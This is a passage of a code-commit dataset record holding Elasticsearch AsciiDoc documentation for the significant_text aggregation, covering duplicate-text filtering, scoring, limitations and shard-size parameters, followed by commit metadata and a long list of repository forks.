into examples of these documents to see why pozmantier is connected using this query:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\": {\n \"simple_query_string\": {\n \"query\": \"+elasticsearch +pozmantier\"\n }\n },\n \"_source\": [\n \"title\",\n \"source\"\n ],\n \"highlight\": {\n \"fields\": {\n \"content\": {}\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\nThe results show a series of very similar news articles about a judging panel for a number of tech projects:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"hits\": {\n \"hits\": [\n {\n ...\n \"_source\": {\n \"source\": \"Presentation Master\",\n \"title\": \"T.E.N. Announces Nominees for the 2015 ISE\u00ae North America Awards\"\n },\n \"highlight\": {\n \"content\": [\n \"City of San Diego Mike <em>Pozmantier<\/em>, Program Manager, Cyber Security Division, Department of\",\n \" Janus, Janus <em>ElasticSearch<\/em> Security Visualization Engine \"\n ]\n }\n },\n {\n ...\n \"_source\": {\n \"source\": \"RCL Advisors\",\n \"title\": \"T.E.N. Announces Nominees for the 2015 ISE(R) North America Awards\"\n },\n \"highlight\": {\n \"content\": [\n \"Mike <em>Pozmantier<\/em>, Program Manager, Cyber Security Division, Department of Homeland Security S&T\",\n \"Janus, Janus <em>ElasticSearch<\/em> Security Visualization Engine\"\n ]\n }\n },\n ...\n--------------------------------------------------\n\/\/ NOTCONSOLE\nMike Pozmantier was one of many judges on a panel and elasticsearch was used in one of many projects being judged.\n\nAs is typical, this lengthy press release was cut-and-paste by a variety of news sites and consequently any rare names, numbers or \ntypos they contain become statistically correlated with our matching query.\n\nFortunately similar documents tend to rank similarly so as part of examining the stream of top-matching documents the significant_text\naggregation can apply a filter to remove sequences of any 6 or more tokens that have already been seen. Let's try this same query now but\nwith the `filter_duplicate_text` setting turned on:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\": {\n \"match\": {\n \"content\": \"elasticsearch\"\n }\n },\n \"aggs\": {\n \"sample\": {\n \"sampler\": {\n \"shard_size\": 100\n },\n \"aggs\": {\n \"keywords\": {\n \"significant_text\": {\n \"field\": \"content\",\n \"filter_duplicate_text\": true\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\nThe results from analysing our deduplicated text are obviously of higher quality to anyone familiar with the elastic stack:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sample\": {\n \"doc_count\": 35,\n \"keywords\": {\n \"doc_count\": 35,\n \"buckets\": [\n {\n \"key\": \"elasticsearch\",\n \"doc_count\": 22,\n \"score\": 11288.001166180758,\n \"bg_count\": 35\n },\n {\n \"key\": \"logstash\",\n \"doc_count\": 3,\n \"score\": 1836.648979591837,\n \"bg_count\": 4\n },\n {\n \"key\": \"kibana\",\n \"doc_count\": 3,\n \"score\": 1469.3020408163263,\n \"bg_count\": 5\n }\n ]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nMr Pozmantier and other one-off associations with elasticsearch no longer appear in the aggregation \nresults as a consequence of copy-and-paste operations or other forms of mechanical repetition. \n\nIf your duplicate or near-duplicate content is identifiable via a single-value indexed field (perhaps\na hash of the article's `title` text or an `original_press_release_url` field) then it would be more \nefficient to use a parent <<search-aggregations-bucket-diversified-sampler-aggregation,diversified sampler>> aggregation\nto eliminate these documents from the sample set based on that single key. The less duplicate content you can feed into\nthe significant_text aggregation up front the better in terms of performance.\n\n\n.How are the significance scores calculated?\n**********************************\nThe numbers returned for scores are primarily intended for ranking different suggestions sensibly rather than something easily \nunderstood by end users. The scores are derived from the doc frequencies in _foreground_ and _background_ sets. In brief, a \nterm is considered significant if there is a noticeable difference in the frequency in which a term appears in the subset and \nin the background. The way the terms are ranked can be configured, see \"Parameters\" section.\n\n**********************************\n\n.Use the _\"like this but not this\"_ pattern\n**********************************\nYou can spot mis-categorized content by first searching a structured field e.g. `category:adultMovie` and use significant_text on the\ntext \"movie_description\" field. Take the suggested words (I'll leave them to your imagination) and then search for all movies NOT marked as category:adultMovie but containing these keywords.\nYou now have a ranked list of badly-categorized movies that you should reclassify or at least remove from the \"familyFriendly\" category.\n\nThe significance score from each term can also provide a useful `boost` setting to sort matches.\nUsing the `minimum_should_match` setting of the `terms` query with the keywords will help control the balance of precision\/recall in the result set i.e\na high setting would have a small number of relevant results packed full of keywords and a setting of \"1\" would produce a more exhaustive results set with all documents containing _any_ keyword.\n\n**********************************\n\n\n\n==== Limitations\n\n\n===== No support for child aggregations\nThe significant_text aggregation intentionally does not support the addition of child aggregations because:\n\n* It would come with a high memory cost\n* It isn't a generally useful feature and there is a workaround for those that need it\n\nThe volume of candidate terms is generally very high and these are pruned heavily before the final\nresults are returned. Supporting child aggregations would generate additional churn and be inefficient.\nClients can always take the heavily-trimmed set of results from a `significant_text` request and \nmake a subsequent follow-up query using a `terms` aggregation with an `include` clause and child\naggregations to perform further analysis of selected keywords in a more efficient fashion.\n\n===== No support for nested objects\n\nThe significant_text aggregation currently also cannot be used with text fields in\nnested objects, because it works with the document JSON source. This makes this\nfeature inefficient when matching nested docs from stored JSON given a matching\nLucene docID.\n\n===== Approximate counts\nThe counts of how many documents contain a term provided in results are based on summing the samples returned from each shard and\nas such may be:\n\n* low if certain shards did not provide figures for a given term in their top sample\n* high when considering the background frequency as it may count occurrences found in deleted documents\n\nLike most design decisions, this is the basis of a trade-off in which we have chosen to provide fast performance at the cost of some (typically small) inaccuracies.\nHowever, the `size` and `shard size` settings covered in the next section provide tools to help control the accuracy levels.\n\n==== Parameters\n\n===== Significance heuristics\n\nThis aggregation supports the same scoring heuristics (JLH, mutual_information, gnd, chi_square etc) as the <<search-aggregations-bucket-significantterms-aggregation,significant terms>> aggregation\n\n\n===== Size & Shard Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nIf the number of unique terms is greater than `size`, the returned list can be slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned).\n\nTo ensure better accuracy a multiple of the final `size` is used as the number of terms to request from each shard\nusing a heuristic based on the number of shards. To take manual control of this setting the `shard_size` parameter\ncan be used to control the volumes of candidate terms produced by each shard.\n\nLow-frequency terms can turn out to be the most interesting ones once all results are combined so the\nsignificant_terms aggregation can produce higher-quality results when the `shard_size` parameter is set to\nvalues significantly higher than the `size` setting. This ensures that a bigger volume of promising candidate terms are given\na consolidated review by the reducing node before the final selection. Obviously large candidate term lists\nwill cause extra network traffic and RAM usage so this is quality\/cost trade off that needs to be balanced. If `shard_size` is set to -1 (the default) then `shard_size` will be automatically estimated based on the number of shards and the `size` parameter.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will\n override it and reset it to be equal to `size`.\n\n===== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option.\nThe Default value is 3.\n\nTerms that score highly will be collected on a shard level and merged with the terms collected from other shards in a second step. \nHowever, the shard does not have the information about the global term frequencies available. The decision if a term is added to a \ncandidate list depends only on the score computed on the shard using local shard frequencies, not the global frequencies of the word.\nThe `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the \nterm as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. \nThis might cause many (globally) high frequent terms to be missing in the final result if low frequent but high scoring terms populated \nthe candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. \nHowever, this increases memory consumption and network traffic.\n\n`shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or \nnot with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the \n`shard_min_doc_count`. If your dictionary contains many low frequent words and you are not interested in these (for example misspellings), \nthen you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty \nnot reach the required `min_doc_count` even after merging the local frequencies. `shard_min_doc_count` is set to `1` per default and has \nno effect unless you explicitly set it.\n\n\n\n\nWARNING: Setting `min_doc_count` to `1` is generally not advised as it tends to return terms that\n are typos or other bizarre curiosities. Finding more than one instance of a term helps\n reinforce that, while still rare, the term was not the result of a one-off accident. The\n default value of 3 is used to provide a minimum weight-of-evidence.\n Setting `shard_min_doc_count` too high will cause significant candidate terms to be filtered out on a shard level. \n This value should be set much lower than `min_doc_count\/#shards`.\n\n\n\n===== Custom background context\n\nThe default source of statistical information for background term frequencies is the entire index and this\nscope can be narrowed through the use of a `background_filter` to focus in on significant terms within a narrower\ncontext:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\n \"content\" : \"madrid\"\n }\n },\n \"aggs\" : {\n \"tags\" : {\n \"significant_text\" : {\n \"field\" : \"content\",\n \"background_filter\": {\n \"term\" : { \"content\" : \"spain\"}\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\nThe above filter would help focus in on terms that were peculiar to the city of Madrid rather than revealing\nterms like \"Spanish\" that are unusual in the full index's worldwide context but commonplace in the subset of documents containing the\nword \"Spain\".\n\nWARNING: Use of background filters will slow the query as each term's postings must be filtered to determine a frequency\n\n\n===== Dealing with source and index mappings\n\nOrdinarily the indexed field name and the original JSON field being retrieved share the same name.\nHowever with more complex field mappings using features like `copy_to` the source \nJSON field(s) and the indexed field being aggregated can differ.\nIn these cases it is possible to list the JSON _source fields from which text\nwill be analyzed using the `source_fields` parameter:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\n \"custom_all\" : \"elasticsearch\"\n }\n },\n \"aggs\" : {\n \"tags\" : {\n \"significant_text\" : {\n \"field\" : \"custom_all\",\n \"source_fields\": [\"content\" , \"title\"]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\n\n===== Filtering Values\n\nIt is possible (although rarely required) to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on a regular expression string or arrays of exact terms. This functionality mirrors the features\ndescribed in the <<search-aggregations-bucket-terms-aggregation,terms aggregation>> documentation.\n\n\n","old_contents":"[[search-aggregations-bucket-significanttext-aggregation]]\n=== Significant Text Aggregation\n\nexperimental[]\n\nAn aggregation that returns interesting or unusual occurrences of free-text terms in a set.\nIt is like the <<search-aggregations-bucket-significantterms-aggregation,significant terms>> aggregation but differs in that:\n\n* It is specifically designed for use on type `text` fields\n* It does not require field data or doc-values\n* It re-analyzes text content on-the-fly meaning it can also filter duplicate sections of\nnoisy text that otherwise tend to skew statistics.\n\nWARNING: Re-analyzing _large_ result sets will require a lot of time and memory. It is recommended that the significant_text\n aggregation is used as a child of either the <<search-aggregations-bucket-sampler-aggregation,sampler>> or \n <<search-aggregations-bucket-diversified-sampler-aggregation,diversified sampler>> aggregation to limit the analysis\n to a _small_ selection of top-matching documents e.g. 200. This will typically improve speed, memory use and quality of\n results.\n\n.Example use cases:\n* Suggesting \"H5N1\" when users search for \"bird flu\" to help expand queries\n* Suggesting keywords relating to stock symbol $ATI for use in an automated news classifier\n\nIn these cases the words being selected are not simply the most popular terms in results. The most popular words tend to be\nvery boring (_and, of, the, we, I, they_ ...).\nThe significant words are the ones that have undergone a significant change in popularity measured between a _foreground_ and _background_ set.\nIf the term \"H5N1\" only exists in 5 documents in a 10 million document index and yet is found in 4 of the 100 documents that make up a user's search results\nthat is significant and probably very relevant to their search. 5\/10,000,000 vs 4\/100 is a big swing in frequency.\n\nexperimental[The `significant_text` aggregation is new and may change in non-backwards compatible ways if we add further text-analysis features e.g. phrase detection]\n\n==== Basic use\n\nIn the typical use case, the _foreground_ set of interest is a selection of the top-matching search results for a query \nand the _background_set used for statistical comparisons is the index or indices from which the results were gathered.\n\nExample:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\"content\" : \"Bird flu\"}\n },\n \"aggregations\" : {\n \"my_sample\" : {\n \"sampler\" : {\n \"shard_size\" : 100\n },\n \"aggregations\": {\n \"keywords\" : {\n \"significant_text\" : { \"field\" : \"content\" }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 9,\n \"timed_out\": false,\n \"_shards\": ...,\n \"hits\": ...,\n \"aggregations\" : {\n \"my_sample\": {\n \"doc_count\": 100,\n \"keywords\" : {\n \"doc_count\": 100,\n \"buckets\" : [\n {\n \"key\": \"h5n1\",\n \"doc_count\": 4,\n \"score\": 4.71235374214817,\n \"bg_count\": 5\n }\n ...\n ]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nThe results show that \"h5n1\" is one of several terms strongly associated with bird flu.\nIt only occurs 5 times in our index as a whole (see the `bg_count`) and yet 4 of these \nwere lucky enough to appear in our 100 document sample of \"bird flu\" results. That suggests\na significant word and one which the user can potentially add to their search. \n\n\n==== Dealing with noisy data using `filter_duplicate_text`\nFree-text fields often contain a mix of original content and mechanical copies of text (cut-and-paste biographies, email reply chains, \nretweets, boilerplate headers\/footers, page navigation menus, sidebar news links, copyright notices, standard disclaimers, addresses).\n\nIn real-world data these duplicate sections of text tend to feature heavily in `significant_text` results if they aren't filtered out.\nFiltering near-duplicate text is a difficult task at index-time but we can cleanse the data on-the-fly at query time using the \n`filter_duplicate_text` setting.\n\n\nFirst let's look at an unfiltered real-world example using the http:\/\/research.signalmedia.co\/newsir16\/signal-dataset.html[Signal media dataset] of\na million news articles covering a wide variety of news. Here are the raw significant text results for a search for the articles \nmentioning \"elasticsearch\":\n\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sample\": {\n \"doc_count\": 35,\n \"keywords\": {\n \"doc_count\": 35,\n \"buckets\": [\n {\n \"key\": \"elasticsearch\",\n \"doc_count\": 35,\n \"score\": 28570.428571428572,\n \"bg_count\": 35\n },\n ...\n {\n \"key\": \"currensee\",\n \"doc_count\": 8,\n \"score\": 6530.383673469388,\n \"bg_count\": 8\n },\n ...\n {\n \"key\": \"pozmantier\",\n \"doc_count\": 4,\n \"score\": 3265.191836734694,\n \"bg_count\": 4\n },\n ...\n\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nThe uncleansed documents have thrown up some odd-looking terms that are, on the face of it, statistically \ncorrelated with appearances of our search term \"elasticsearch\" e.g. \"pozmantier\".\nWe can drill down into examples of these documents to see why pozmantier is connected using this query:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\": {\n \"simple_query_string\": {\n \"query\": \"+elasticsearch +pozmantier\"\n }\n },\n \"_source\": [\n \"title\",\n \"source\"\n ],\n \"highlight\": {\n \"fields\": {\n \"content\": {}\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\nThe results show a series of very similar news articles about a judging panel for a number of tech projects:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"hits\": {\n \"hits\": [\n {\n ...\n \"_source\": {\n \"source\": \"Presentation Master\",\n \"title\": \"T.E.N. Announces Nominees for the 2015 ISE\u00ae North America Awards\"\n },\n \"highlight\": {\n \"content\": [\n \"City of San Diego Mike <em>Pozmantier<\/em>, Program Manager, Cyber Security Division, Department of\",\n \" Janus, Janus <em>ElasticSearch<\/em> Security Visualization Engine \"\n ]\n }\n },\n {\n ...\n \"_source\": {\n \"source\": \"RCL Advisors\",\n \"title\": \"T.E.N. Announces Nominees for the 2015 ISE(R) North America Awards\"\n },\n \"highlight\": {\n \"content\": [\n \"Mike <em>Pozmantier<\/em>, Program Manager, Cyber Security Division, Department of Homeland Security S&T\",\n \"Janus, Janus <em>ElasticSearch<\/em> Security Visualization Engine\"\n ]\n }\n },\n ...\n--------------------------------------------------\n\/\/ NOTCONSOLE\nMike Pozmantier was one of many judges on a panel and elasticsearch was used in one of many projects being judged.\n\nAs is typical, this lengthy press release was cut-and-paste by a variety of news sites and consequently any rare names, numbers or \ntypos they contain become statistically correlated with our matching query.\n\nFortunately similar documents tend to rank similarly so as part of examining the stream of top-matching documents the significant_text\naggregation can apply a filter to remove sequences of any 6 or more tokens that have already been seen. Let's try this same query now but\nwith the `filter_duplicate_text` setting turned on:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\": {\n \"match\": {\n \"content\": \"elasticsearch\"\n }\n },\n \"aggs\": {\n \"sample\": {\n \"sampler\": {\n \"shard_size\": 100\n },\n \"aggs\": {\n \"keywords\": {\n \"significant_text\": {\n \"field\": \"content\",\n \"filter_duplicate_text\": true\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\nThe results from analysing our deduplicated text are obviously of higher quality to anyone familiar with the elastic stack:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"sample\": {\n \"doc_count\": 35,\n \"keywords\": {\n \"doc_count\": 35,\n \"buckets\": [\n {\n \"key\": \"elasticsearch\",\n \"doc_count\": 22,\n \"score\": 11288.001166180758,\n \"bg_count\": 35\n },\n {\n \"key\": \"logstash\",\n \"doc_count\": 3,\n \"score\": 1836.648979591837,\n \"bg_count\": 4\n },\n {\n \"key\": \"kibana\",\n \"doc_count\": 3,\n \"score\": 1469.3020408163263,\n \"bg_count\": 5\n }\n ]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nMr Pozmantier and other one-off associations with elasticsearch no longer appear in the aggregation \nresults as a consequence of copy-and-paste operations or other forms of mechanical repetition. \n\nIf your duplicate or near-duplicate content is identifiable via a single-value indexed field (perhaps\na hash of the article's `title` text or an `original_press_release_url` field) then it would be more \nefficient to use a parent <<search-aggregations-bucket-diversified-sampler-aggregation,diversified sampler>> aggregation\nto eliminate these documents from the sample set based on that single key. The less duplicate content you can feed into\nthe significant_text aggregation up front the better in terms of performance.\n\n\n.How are the significance scores calculated?\n**********************************\nThe numbers returned for scores are primarily intended for ranking different suggestions sensibly rather than something easily \nunderstood by end users. The scores are derived from the doc frequencies in _foreground_ and _background_ sets. In brief, a \nterm is considered significant if there is a noticeable difference in the frequency in which a term appears in the subset and \nin the background. The way the terms are ranked can be configured, see \"Parameters\" section.\n\n**********************************\n\n.Use the _\"like this but not this\"_ pattern\n**********************************\nYou can spot mis-categorized content by first searching a structured field e.g. `category:adultMovie` and use significant_text on the\ntext \"movie_description\" field. Take the suggested words (I'll leave them to your imagination) and then search for all movies NOT marked as category:adultMovie but containing these keywords.\nYou now have a ranked list of badly-categorized movies that you should reclassify or at least remove from the \"familyFriendly\" category.\n\nThe significance score from each term can also provide a useful `boost` setting to sort matches.\nUsing the `minimum_should_match` setting of the `terms` query with the keywords will help control the balance of precision\/recall in the result set i.e\na high setting would have a small number of relevant results packed full of keywords and a setting of \"1\" would produce a more exhaustive results set with all documents containing _any_ keyword.\n\n**********************************\n\n\n\n==== Limitations\n\n\n===== No support for child aggregations\nThe significant_text aggregation intentionally does not support the addition of child aggregations because:\n\n* It would come with a high memory cost\n* It isn't a generally useful feature and there is a workaround for those that need it\n\nThe volume of candidate terms is generally very high and these are pruned heavily before the final\nresults are returned. Supporting child aggregations would generate additional churn and be inefficient.\nClients can always take the heavily-trimmed set of results from a `significant_text` request and \nmake a subsequent follow-up query using a `terms` aggregation with an `include` clause and child\naggregations to perform further analysis of selected keywords in a more efficient fashion.\n\n\n===== Approximate counts\nThe counts of how many documents contain a term provided in results are based on summing the samples returned from each shard and\nas such may be:\n\n* low if certain shards did not provide figures for a given term in their top sample\n* high when considering the background frequency as it may count occurrences found in deleted documents\n\nLike most design decisions, this is the basis of a trade-off in which we have chosen to provide fast performance at the cost of some (typically small) inaccuracies.\nHowever, the `size` and `shard size` settings covered in the next section provide tools to help control the accuracy levels.\n\n==== Parameters\n\n===== Significance heuristics\n\nThis aggregation supports the same scoring heuristics (JLH, mutual_information, gnd, chi_square etc) as the <<search-aggregations-bucket-significantterms-aggregation,significant terms>> aggregation\n\n\n===== Size & Shard Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nIf the number of unique terms is greater than `size`, the returned list can be slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned).\n\nTo ensure better accuracy a multiple of the final `size` is used as the number of terms to request from each shard\nusing a heuristic based on the number of shards. To take manual control of this setting the `shard_size` parameter\ncan be used to control the volumes of candidate terms produced by each shard.\n\nLow-frequency terms can turn out to be the most interesting ones once all results are combined so the\nsignificant_terms aggregation can produce higher-quality results when the `shard_size` parameter is set to\nvalues significantly higher than the `size` setting. This ensures that a bigger volume of promising candidate terms are given\na consolidated review by the reducing node before the final selection. Obviously large candidate term lists\nwill cause extra network traffic and RAM usage so this is quality\/cost trade off that needs to be balanced. If `shard_size` is set to -1 (the default) then `shard_size` will be automatically estimated based on the number of shards and the `size` parameter.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will\n override it and reset it to be equal to `size`.\n\n===== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option.\nThe Default value is 3.\n\nTerms that score highly will be collected on a shard level and merged with the terms collected from other shards in a second step. \nHowever, the shard does not have the information about the global term frequencies available. The decision if a term is added to a \ncandidate list depends only on the score computed on the shard using local shard frequencies, not the global frequencies of the word.\nThe `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the \nterm as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. \nThis might cause many (globally) high frequent terms to be missing in the final result if low frequent but high scoring terms populated \nthe candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. \nHowever, this increases memory consumption and network traffic.\n\n`shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or \nnot with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the \n`shard_min_doc_count`. If your dictionary contains many low frequent words and you are not interested in these (for example misspellings), \nthen you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty \nnot reach the required `min_doc_count` even after merging the local frequencies. `shard_min_doc_count` is set to `1` per default and has \nno effect unless you explicitly set it.\n\n\n\n\nWARNING: Setting `min_doc_count` to `1` is generally not advised as it tends to return terms that\n are typos or other bizarre curiosities. Finding more than one instance of a term helps\n reinforce that, while still rare, the term was not the result of a one-off accident. The\n default value of 3 is used to provide a minimum weight-of-evidence.\n Setting `shard_min_doc_count` too high will cause significant candidate terms to be filtered out on a shard level. \n This value should be set much lower than `min_doc_count\/#shards`.\n\n\n\n===== Custom background context\n\nThe default source of statistical information for background term frequencies is the entire index and this\nscope can be narrowed through the use of a `background_filter` to focus in on significant terms within a narrower\ncontext:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\n \"content\" : \"madrid\"\n }\n },\n \"aggs\" : {\n \"tags\" : {\n \"significant_text\" : {\n \"field\" : \"content\",\n \"background_filter\": {\n \"term\" : { \"content\" : \"spain\"}\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\nThe above filter would help focus in on terms that were peculiar to the city of Madrid rather than revealing\nterms like \"Spanish\" that are unusual in the full index's worldwide context but commonplace in the subset of documents containing the\nword \"Spain\".\n\nWARNING: Use of background filters will slow the query as each term's postings must be filtered to determine a frequency\n\n\n===== Dealing with source and index mappings\n\nOrdinarily the indexed field name and the original JSON field being retrieved share the same name.\nHowever with more complex field mappings using features like `copy_to` the source \nJSON field(s) and the indexed field being aggregated can differ.\nIn these cases it is possible to list the JSON _source fields from which text\nwill be analyzed using the `source_fields` parameter:\n\n[source,js]\n--------------------------------------------------\nGET news\/article\/_search\n{\n \"query\" : {\n \"match\" : {\n \"custom_all\" : \"elasticsearch\"\n }\n },\n \"aggs\" : {\n \"tags\" : {\n \"significant_text\" : {\n \"field\" : \"custom_all\",\n \"source_fields\": [\"content\" , \"title\"]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:news]\n\n\n===== Filtering Values\n\nIt is possible (although rarely required) to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on a regular expression string or arrays of exact terms. This functionality mirrors the features\ndescribed in the <<search-aggregations-bucket-terms-aggregation,terms aggregation>> documentation.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f34508ff8a1d85b43a0beccfc8d7377c2c993450","subject":"Remove outdated key","message":"Remove outdated key\n\nThe `spring.metrics.export.redis.aggregate-key-pattern` is no longer\ndefined but was still referenced in the documentation.\n","repos":"xialeizhou\/spring-boot,xwjxwj30abc\/spring-boot,okba1\/spring-boot,michael-simons\/spring-boot,VitDevelop\/spring-boot,Chomeh\/spring-boot,joshthornhill\/spring-boot,AngusZhu\/spring-boot,dfa1\/spring-boot,kiranbpatil\/spring-boot,allyjunio\/spring-boot,patrikbeno\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,mosen11\/spring-boot,ojacquemart\/spring-boot,master-slave\/spring-boot,nghialunhaiha\/spring-boot,5zzang\/spring-boot,AstaTus\/spring-boot,pnambiarsf\/spring-boot,kamilszymanski\/spring-boot,mouadtk\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,wwadge\/spring-boot,yunbian\/spring-boot,dreis2211\/spring-boot,liupugong\/spring-boot,master-slave\/spring-boot,ractive\/spring-boot,sbuettner\/spring-boot,srinivasan01\/spring-boot,krmcbride\/spring-boot,philwebb\/spring-boot,buobao\/spring-boot,chrylis\/spring-boot,gauravbrills\/spring-boot,SPNilsen\/spring-boot,Buzzardo\/spring-boot,playleud\/spring-boot,lokbun\/spring-boot,axelfontaine\/spring-boot,balajinsr\/spring-boot,kayelau\/spring-boot,joansmith\/spring-boot,i007422\/jenkins2-course-spring-boot,balajinsr\/spring-boot,ihoneymon\/spring-boot,end-user\/spring-boot,ollie314\/spring-boot,dreis2211\/spring-boot,chrylis\/spring-boot,Xaerxess\/spring-boot,5zzang\/spring-boot,murilobr\/spring-boot,axibase\/spring-boot,raiamber1\/spring-boot,mrumpf\/spring-boot,5zzang\/spring-boot,fulvio-m\/spring-boot,lexandro\/spring-boot,meloncocoo\/spring-boot,orangesdk\/spring-boot,ApiSecRay\/spring-boot,nandakishorm\/spring-boot,cbtpro\/spring-boot,philwebb\/spring-boot-concourse,thomasdarimont\/spring-boot,dfa1\/spring-boot,jeremiahmarks\/spring-boot,shakuzen\/spring-boot,bbrouwer\/spring-boot,panbiping\/spring-boot,DeezCashews\/spring-boot,fjlopez\/spring-boot,fjlopez\/spring-boot,kiranbpatil\/spring-boot,ralenmandao\/spring-boot,donthadineshkumar\/spring-boot,hello2009chen\/spring-boot,ralenmandao\/spring-boot,peteyan\/spring-boot,yuxiaole\/spring-boot,ractive\/spring-boot,lcardito\/spring-boot,aahlenst\/spring-boot,M3lkior\/spring-boot,PraveenkumarShethe\/spring-boot,sbuettner\/spring-boot,shangyi0102\/spring-boot,vaseemahmed01\/spring-boot,meftaul\/spring-boot,philwebb\/spring-boot,SaravananParthasarathy\/SPSDemo,rickeysu\/spring-boot,paweldolecinski\/spring-boot,jvz\/spring-boot,satheeshmb\/spring-boot,Xaerxess\/spring-boot,damoyang\/spring-boot,yuxiaole\/spring-boot,kiranbpatil\/spring-boot,thomasdarimont\/spring-boot,ameraljovic\/spring-boot,paddymahoney\/spring-boot,wwadge\/spring-boot,nghiavo\/spring-boot,nghialunhaiha\/spring-boot,zorosteven\/spring-boot,damoyang\/spring-boot,AngusZhu\/spring-boot,mosoft521\/spring-boot,peteyan\/spring-boot,simonnordberg\/spring-boot,xwjxwj30abc\/spring-boot,scottfrederick\/spring-boot,ameraljovic\/spring-boot,xdweleven\/spring-boot,nghiavo\/spring-boot,roymanish\/spring-boot,olivergierke\/spring-boot,rweisleder\/spring-boot,nelswadycki\/spring-boot,axibase\/spring-boot,eliudiaz\/spring-boot,huangyugui\/spring-boot,brettwooldridge\/spring-boot,crackien\/spring-boot,nghiavo\/spring-boot,mlc0202\/spring-boot,sbcoba\/spring-boot,bijukunjummen\/spring-boot,panbiping\/spring-boot,mosoft521\/spring-boot,chrylis\/spring-boot,minmay\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,Charkui\/spring-boot,orangesdk\/spring-boot,xc145214\/spring-boot,axelfontaine\/spring-boot,durai145\/spring-boot,Xaerxess\/spring-boot,paddymahoney\/spring-boot,ralenmandao\/spring-boot,patrikbeno\/spring-boot,vpavic\/spring-boot,joshthornhill\/spring-boot,nelswadycki\/spring-boot,rizwan18\/spring-boot,minmay\/spring-boot,kamilszymanski\/spring-boot,lexandro\/spring-boot,nisuhw\/spring-boot,qq83387856\/spring-boot,npcode\/spring-boot,clarklj001\/spring-boot,srinivasan01\/spring-boot,donthadineshkumar\/spring-boot,peteyan\/spring-boot,dfa1\/spring-boot,hqrt\/jenkins2-course-spring-boot,sankin\/spring-boot,scottfrederick\/spring-boot,jayeshmuralidharan\/spring-boot,michael-simons\/spring-boot,RobertNickens\/spring-boot,zhangshuangquan\/spring-root,raiamber1\/spring-boot,DeezCashews\/spring-boot,h